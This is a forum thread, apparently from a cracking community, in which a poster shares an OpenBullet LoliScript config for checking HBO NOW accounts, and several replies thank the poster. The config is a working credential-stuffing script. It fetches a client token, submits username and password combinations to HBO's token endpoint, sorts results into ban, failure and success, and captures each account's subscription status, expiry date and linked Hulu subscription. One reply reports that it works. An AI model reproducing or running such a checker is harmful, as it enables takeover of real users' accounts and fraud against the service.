Sign in to follow this  
sYdr1b

HBOnow | CAP | LoliScript | OpenBullet

Recommended Posts

[hide]

FUNCTION RandomNum 0 9999 -> VAR "RANDOM" 

REQUEST POST "https://comet.api.hbo.com/tokens" 

  CONTENT "{\"client_id\":\"7e278f74-d580-4292-b3a9-f7a023e5ca03\",\"client_secret\":\"7e278f74-d580-4292-b3a9-f7a023e5ca03\",\"scope\":\"browse video_playback_free account_registration\",\"grant_type\":\"client_credentials\",\"deviceSerialNumber\":\"b1c15492-7d2b-4457-bf91-e018ebd7\",\"clientDeviceData\":{\"paymentProviderCode\":\"apple\"}}" 

  CONTENTTYPE "application/json" 

  HEADER "User-Agent: HBO%20NOW/21.0.0.161 CFNetwork/897.15 Darwin/17.5.0" 

  HEADER "Pragma: no-cache" 

  HEADER "Accept: application/vnd.hbo.v9.full+json" 

  HEADER "Host: comet.api.hbo.com" 

  HEADER "X-Hbo-Client-Version: Hadron/21.0.0.161 ios (IPHONE/12.0.1)" 

  HEADER "Accept-Language: en-us" 

  HEADER "Accept-Encoding: br, gzip, deflate" 

PARSE "

" JSON "access_token" Recursive=False -> VAR "TOKEN" 

REQUEST POST "https://comet.api.hbo.com/tokens" 

  CONTENT "{\"grant_type\":\"user_name_password\",\"scope\":\"browse video_playback device elevated_account_management\",\"username\":\"\",\"password\":\"\"}" 

  CONTENTTYPE "application/json" 

  HEADER "User-Agent: HBO%20NOW/21.0.0.161 CFNetwork/897.15 Darwin/17.5.0" 

  HEADER "Pragma: no-cache" 

  HEADER "Accept: application/vnd.hbo.v9.full+json" 

  HEADER "Host: comet.api.hbo.com" 

  HEADER "X-Hbo-Client-Version: Hadron/21.0.0.161 ios (IPHONE/12.0.1)" 

  HEADER "Connection: keep-alive" 

  HEADER "Accept-Language: en-us" 

  HEADER "Authorization: Bearer " 

  HEADER "Accept-Encoding: br, gzip, deflate" 

KEYCHECK BanOnToCheck=False

  KEYCHAIN Ban OR 

    KEY "" Contains "403" 

  KEYCHAIN Failure OR 

    KEY "" Contains "401" 

  KEYCHAIN Success OR 

    KEY "access_token" 

PARSE "

" JSON "access_token" Recursive=False -> VAR "TOKEN2" 

REQUEST POST "https://comet.api.hbo.com/content" 

  CONTENT "[{\"id\":\"urn:hbo:billing-status:mine\"}]" 

  CONTENTTYPE "application/json" 

  HEADER "User-Agent: HBO%20NOW/21.0.0.161 CFNetwork/897.15 Darwin/17.5.0" 

  HEADER "Pragma: no-cache" 

  HEADER "Accept: application/vnd.hbo.v9.full+json" 

  HEADER "Host: comet.api.hbo.com" 

  HEADER "X-Hbo-Client-Version: Hadron/21.0.0.161 ios (IPHONE/12.0.1)" 

  HEADER "Connection: keep-alive" 

  HEADER "Accept-Language: en-us" 

  HEADER "Authorization: Bearer " 

  HEADER "Accept-Encoding: br, gzip, deflate" 

KEYCHECK BanOnToCheck=False

  KEYCHAIN Custom "FREE" OR 

    KEY "You’re not subscribed to HBO NOW" 

    KEY "expired" 

PARSE "

" LR "nYour" "(" Recursive=False -> CAP "EXPIRE DATE" 

PARSE "

" LR "\": \"Your" "(" Recursive=False -> CAP "HULU LINKED SUB?" 

[/hide]

Share this post


Link to post
Share on other sites

thanks let me see ..!!


how we using this ..?

Share this post


Link to post
Share on other sites

Thank you for sharing your hard work brother  :hype:

Share this post


Link to post
Share on other sites

muchas gracias

Share this post


Link to post
Share on other sites

YEAHHHHHHHHHHHH

Share this post


Link to post
Share on other sites

This is my first time using OpenBullet. So I want to see how the configs are created. I have no particular reason to see HBO but it was the first one the list. Thanks for sharing this one.

Share this post


Link to post
Share on other sites

thanks so much ..!! let us see ..!

Share this post


Link to post
Share on other sites

Good share, needed that mate.

Share this post


Link to post
Share on other sites

hope it's really working.

Share this post


Link to post
Share on other sites

keep going

i will test it

Share this post


Link to post
Share on other sites

working good mate thanks :fiesta:

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this